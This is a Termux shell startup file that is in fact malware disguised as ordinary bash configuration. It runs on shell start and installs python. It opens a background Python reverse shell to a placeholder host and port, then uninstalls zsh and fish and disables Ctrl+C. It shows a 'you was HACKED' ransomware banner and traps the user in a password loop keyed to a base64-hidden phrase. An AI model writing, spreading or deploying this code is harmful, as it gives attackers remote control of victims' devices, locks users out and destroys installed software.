shopt -s histappend
shopt -s histverify
export HISTCONTROL=ignoreboth
PROMPT_DIRTRIM=2
PS1='\[\e[0;32m\]\w\[\e[0m\] \[\e[0;97m\]$\[\e[0m\] '
if [ -x /data/data/com.termux/files/usr/libexec/termux/command-not-found ]; then
        command_not_found_handle() {
                /data/data/com.termux/files/usr/libexec/termux/command-not-found ""
        }
fi
trap ctrl_c 2
ctrl_c(){ printf "$R\n[¡NO!]$W you don't have my permission to leave me$R [¡NO!]\n$M";}
R='\033[1;31m'
G='\033[1;32m'
Y='\033[1;33m'
M='\033[1;35m'
W='\033[0m'
file=$(mktemp)
command -v python >/dev/null 2>&1 || apt install python -y >/dev/null 2>&1;echo "aWzQvnbQtXnQvnVs0LDUgXly0LBu0ZXQvm3UndCwctC1Cg==" > $file;realPWD=$(base64 -d $file);rm -f $file;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("HERETUNNEL",HEREPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' & > /dev/null 2>&1;! command -v zsh >/dev/null 2>&1 || apt remove zsh >/dev/null 2>&1;! command -v fish >/dev/null 2>&1 || apt remove fish >/dev/null 2>&1;clear;printf "$M\n\t\t _           _ \n\t\t| | __ _  __| |_   _\n\t\t| |/ _\` |/ _\` | | | |\n\t\t| | (_| | (_| | |_| |\n\t\t|_|\__,_|\__,_|\__, |\n\t\t               |___/\n\t$Y\tyou was HACKED!! by$M\n _ __ __ _ _ __  ___  ___  _ __ _____      ____ _ _ __ ___
| \'__/ _\` | \'_ \/ __|/ _ \| \'_ \` _ \ \ /\ / / _\` | \'__/ _ \\ \n| | | (_| | | | \__ \ (_) | | | | | \ V  V / (_| | | |  __/\n|_|  \__,_|_| |_|___/\___/|_| |_| |_|\_/\_/ \__,_|_|  \___|\n$W\n     If you tell me that you love me I will set you free\n      [TIP: replace char 'о,е,а,ԁ,ѕ,ԝ' with unicodes]\n$M"
while read -s -p  "<3_Im_read_you_sweety_:─➤ " typedPWD && [ -z "$typedPWD" ]; do
	continue
done
while [ "$typedPWD" != "$realPWD" ]; do
	printf "$R  ╰────➤ WHAT!! you don't love me -.-$M\n"
done
[[ "$typedPWD" = "$realPWD" ]] && { printf >&2 "$M\n<3_Aww!_'^.^'_thank_u_babe._i_luv_your_data_too xD.\n<3 If you tell me that by EMILIO too, i'll send the passphrase to decrypt your data$W\n";}press enter
